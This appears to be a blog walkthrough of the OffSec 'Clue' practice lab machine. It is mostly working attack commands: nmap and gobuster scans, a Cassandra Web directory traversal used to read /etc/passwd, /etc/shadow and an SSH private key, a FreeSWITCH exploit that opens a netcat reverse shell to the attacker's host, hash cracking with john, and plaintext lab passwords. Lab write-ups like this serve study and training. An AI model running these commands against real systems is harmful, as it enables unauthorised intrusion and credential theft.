02 Jun, 2024

#reconnaissance #Nmap #web server #offsec

Offsec - Clue

The reconnaissance phase involved scanning the target IP address using Nmap, which revealed open ports and services. Further investigation focused on the web server and port 3000, which indicated the presence of a web application. Directory discovery techniques were used, including Dirbuster and Gobuster, which uncovered some directories with content. A remote file read exploit was found for Cassandra Web, allowing access to sensitive files. Passwords were revealed, but attempts to log in via SSH were unsuccessful. The Freeswitch service was also explored, but no successful exploits were found. Finally, using Samba, read permissions were obtained for backups, allowing access to archives of Cassandra and Freeswitch. The password for Freeswitch was obtained from a configuration file, but no further access was gained. Overall, the reconnaissance phase involved thorough scanning and exploitation of various services.

Preston Zen

prestonzen.com

An image to describe post

Recon

#nmap

nmap --top-ports 1000 -T4 192.168.172.240 --open -Pn -vvv

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack
80/tcp   open  http         syn-ack
139/tcp  open  netbios-ssn  syn-ack
445/tcp  open  microsoft-ds syn-ack
3000/tcp open  ppp          syn-ack
8021/tcp open  ftp-proxy    syn-ack

Check out web server and 3000 which maybe a web app

An image to describe post

Forbidden. Maybe there's a URL path with content

Also to check the apache web server

Apache/2.4.38

Found a local exploit for this apache version

An image to describe post

Service Scan

sudo nmap -sV -sC -p 22,80,139,445,3000,8021 -T4 --open -O -vvv -oN serviceScan.nmap 192.168.172.240
`


### #Directory-discovery 
dirbuster is slow but simple

dirb http://192.168.172.240/


Gobuster is faster but is flag heavy

gobuster dir -u http://192.168.172.240/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt


Found backup but has a 301 error 

![](https://static.quail.ink/media/7k7mni9p6.webp)


![](https://static.quail.ink/media/0m0pei49w.webp)



On port 3000

Cassanddra web
![](https://static.quail.ink/media/r8nl0uw32.webp)

gobuster on this webapp (Added content length exception)

Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.172.240:3000/289003ce-49a6-4fd4-bd6e-5c5d26acbda7 => 200 (Length: 3837). To continue please exclude the status code or the length

gobuster dir -u http://192.168.172.240:3000 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --exclude-length 3837


```sh
searchsploit Cassandra Web

Find a remote file read exploit

An image to describe post

add -p to show full path

/usr/share/exploitdb/exploits/linux/webapps/49362.py

49362.py [-h] [-p PORT] [-f] [-n NUMBER] target file

according to the code it's a directory traversal

curl --path-as-is 192.168.172.240:3000/../../../../../../../../etc/passwd

Also the exploit works too

python /usr/share/exploitdb/exploits/linux/webapps/49362.py -p 3000 192.168.172.240 /etc/passwd -n 8

An image to describe post

uploading image.png...

These users have home directories
cassie:x:1000:1000::/home/cassie:/bin/bash
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bash

Got permission denied for /etc/shadow
Failed to read /etc/shadow (perm denied likely)

According to the exploit doc this command should reveal passwords since they are passed to Casssandra via CLi

cassmoney.py 10.0.0.5 /proc/self/cmdline

And we get it

An image to describe post

Password: SecondBiteTheApple330

Trying ssh with cassie we can't login

Checking the SSH Config file

python /usr/share/exploitdb/exploits/linux/webapps/49362.py -p 3000 192.168.172.240 /etc/ssh/sshd_config -n 8

Only root or anthony can login via ssh

An image to describe post

#Freeswitch

searchsploit freeswitch

An image to describe post

Python script usage

# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system

./freeswitch-exploit.py 192.168.1.100 whoami

python freeswitchExploit.py 192.168.172.240 whoami

Authentication failed and also trying the password from before didn't work either

An image to describe post

All that's left is Samba

#Samba

Trying null user and password

crackmapexec smb 192.168.172.240 -u "" -p "" --shares

Run it twice to get past the first use timeout issue

Found read permissions on backup

An image to describe post

Got access to archives of cassandra and freeswitch
An image to describe post

Checking where the password may be stored or if it can be changed
https://inextrix.atlassian.net/wiki/spaces/ASTPP/pages/6007343/Overview

says the password is stored here
/etc/freeswitch/autoload_configs/event_socket.conf.xml

View the file via the exploit

python /usr/share/exploitdb/exploits/linux/webapps/49362.py -p 3000 192.168.172.240 /etc/freeswitch/autoload_configs/event_socket.conf.xml -n 8

An image to describe post

Password: StrongClueConEight021

Updating the Freeswitch exploit
An image to describe post

Running the exploit

An image to describe post

Get id and whoami responses

Prep revershe shell listener

sudo nc -nlvp 443

Reversh shell payload (After some trial and error)

python freeswitchExploit.py 192.168.172.240 'nc -c sh 192.168.45.219 80'

An image to describe post

Upgrade python terminal session

python -c 'import pty; pty.spawn("/bin/bash")'

switch to cassie with su cassie

Her password we got earlier is:SecondBiteTheApple330

She's allowed to run cassandra-web as root
An image to describe post

See an ssh private key on her desktop

Let's run a nother server with root access

sudo cassandra-web -B 0.0.0.0:3001 -u cassie -p SecondBiteTheApple330

An image to describe post

Try to connect

curl --path-as-is 192.168.172.240:3001/../../../../../../../../etc/passwd

#privilege-escalation

Not port forwaded

Now to try to access the web server locally instead

sudo -u root /usr/local/bin/cassandra-web -B 0.0.0.0:1337 -u cassie -p SecondBiteTheApple330

An image to describe post

Runs
Open second connection to the server and switch to cassie to connect to the url locally

curl --path-as-is 192.168.172.240:1337/../../../../../../../../etc/passwd

Works. Now for etc/shadow

curl --path-as-is 192.168.172.240:1337/../../../../../../../../etc/shadow

root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7:::
cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7:::

Run a john crack in case of a weak password

john hashes -w=/usr/share/wordlists/rockyou.txt

Now to check the other user's bash history

curl --path-as-is 192.168.172.240:1337/../../../../../../../../home/anthony/.bash_history

clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exit

Anthony's ssh key works for root according to this so we'll view and copy it

curl --path-as-is 192.168.172.240:1337/../../../../../../../../home/anthony/.ssh/id_rsa

Now to save as a file locally without nano

echo "-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----" > id_rsa

Change permissions to 600

chmod 600 id_rsa

Now to connect as root via ssh while local

ssh root@localhost -i id_rsa

And we're in boys

An image to describe post

And proof is in proof_youtriedharder.txt file

Local is in freeswitch

An image to describe post

sudo find / -type f -name "local.txt"

The first part of the flag is: Alw@ys
I love cats if I wasn't allergic.

An image to describe post

DEL

Offsec - Clue

Recon

#nmap

#Freeswitch

#Samba

#privilege-escalation

Offsec - Codo - Oct 31st 2023

Offsec - Sumo - Jun 15th 2023

Offsec - InfosecPrep - Jun 21st 2023

Offsec - BTRSys2.1 - Nov 4th 2023

Offsec - ICMP - Nov 4th 2023

Offsec - SoSimple - Jun 4th 2023